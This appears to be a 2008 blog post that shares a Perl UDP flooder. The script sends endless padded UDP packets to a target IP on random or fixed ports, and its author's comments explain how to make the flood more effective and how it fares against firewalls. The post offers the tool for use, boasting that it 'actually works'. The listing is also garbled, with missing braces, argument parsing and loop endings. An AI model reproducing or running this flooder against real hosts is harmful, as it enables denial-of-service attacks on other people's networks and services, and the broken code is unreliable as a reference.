Friday, April 25, 2008

UDP flooder

I wrote this because every other one that I found was written incorrectly. This one actually works (and sometimes too well).


# This is a proof of concept UDP flooder. By you executing
# this program, you accept complete liability for any damages
# caused by it.
# made by nwo - 12/11/05

use Socket;


# hit random, non sequential ports
sub rports {
print "Hitting: $ip\n";
print "Packetsize: $size\n\n";
for(;;) {
$port = int(rand 65535) + 1;
send(pkt, "@{$DATA}", 0, sockaddr_in($port, $dest));

if($ARGC != 3) {
print "$0 (ip) (port) (size)\n";
print "If \"port\" is set to \"0\", will send to random ports.\n";


# there's a 4 byte pad added to every 1 byte of data, and 1432 is
# the maximum packet size before fragmentation occurs and fragmented
# UDP packets arent going to have much effect, but we'll leave it up
# to the users descretion.
# - nwo
if($size > "710") {
print "This packet is over 1432 bytes and will be fragmented.\n";

# this is the "trick", as every other idiot out there has attempted to
# define the packet size by simply using $size = $ARGV[whatever], which
# is incorrect as UDP is intended to be a data transport, thus the packet
# data must contain legitimate data or the packet size will be the actual
# scalar value of whatever the size is specified as. So here, we fill the
# @DATA array with the letter "A" for each byte specified, then make a
# reference pointer to it.
# - nwo
push @{$DATA},"A"

# this is another "trick", as I've seen more than one instance where the
# socket creation is created within the while() loop, thus slowing down
# the packets per second, as well as hogging CPU and chewing up file descriptors.
# you kids need to read before trying to create something you don't understand.
# - nwo
socket(pkt, PF_INET, SOCK_DGRAM, getprotobyname("udp")) || die "setsockopt: $!";
$dest = inet_aton($ip);

print "UDPP - nwo\n";

if($port == 0) { &rports; }

# Hit specified port rather than random. Not as effective, but in a scenario
# where the attacker is behind a firewall, it's the only way to bypass it.
# Unfortunately, because this does not use raw sockets (by design), there is
# no way to specify the local port number. This somewhat hinders things, as
# if the firewall on the receiving end is set to only allow packets from
# src_ip:53, for example, the firewall will drop any packet being sent NOT
# coming from source port 53.
# - nwo
if($port ne "0") {
print "Hitting: $ip\n";
print "Packetsize: $size\n";
for(;;) {
send(pkt, "@{$DATA}", 0, sockaddr_in($port, $dest));

No comments: